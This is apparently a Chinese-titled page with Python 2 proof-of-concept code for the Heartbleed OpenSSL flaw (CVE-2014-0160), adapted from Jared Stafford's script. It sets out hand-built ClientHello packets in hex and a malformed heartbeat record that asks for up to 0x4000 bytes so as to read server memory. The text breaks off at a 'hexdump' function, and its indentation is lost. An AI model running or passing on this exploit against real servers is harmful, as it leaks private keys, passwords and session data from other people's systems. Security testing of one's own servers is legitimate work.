HeartBleed Poc脚本
1、发送client hello接收serverhello 之后发送心跳再解析获取的数据信息
2、发送client hello时直接带上心跳消息,然后解析服务器返回信息
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols
# The authors disclaim copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
class par:
port = 443
starttls = "hi"
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', type='string', default='', help='STARTTLS protocol: smtp, pop3, imap, ftp, or xmpp')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hello2 = h2bin('''
16 03 02 00 6c 01 00 00
68 03 01 55 80 a3 2d 12
d8 d2 07 ab 90 86 b4 3d
b6 f2 bd 7b 87 ea e9 cb
db ad c3 84 b0 fa 67 0f
3c de 59 09 a6 44 b7 5c
de 58 1f 67 26 00 38 00
10 00 0c 00 09 00 07 00
14 00 05 00 0e 00 08 00
04 00 0d 00 00 00 15 00
01 00 03 00 0b 00 11 00
12 00 18 00 1a 00 06 00
0a 00 13 00 17 00 16 00
0f 00 02 00 1b 00 19 01
00 18 03 02 00 6f 01 44
21 09 8d 7c 6f b8 a2 26
e3 c7 30 27 aa a5 a4 c2
fe 59 16 48 a7 15 3d a2
f8 8a 4c a5 6c a4 ae 42
4a 34 26 da e1 7d cd 30
c0 d5 a7 89 f4 d0 de 01
1e 79 23 02 09 67 f2 5d
7c ba ad a8 c4 5b 7a 90
7f bb 0c 09 10 1d 3f 28
63 77 98 cf 0c a1 be 04
00 2e fe fc af 57 6e e9
c8 fa c8 03 22 b4 44 e9
20 da d1 bb b2 3d f8 fa
42 9a a5 8b 81
''')
#04 21 is len
#0800 can triger the vulnerability max value4000
hb = h2bin('''
18 03 02 00 03
01 08 00
''')
def hexdump(s):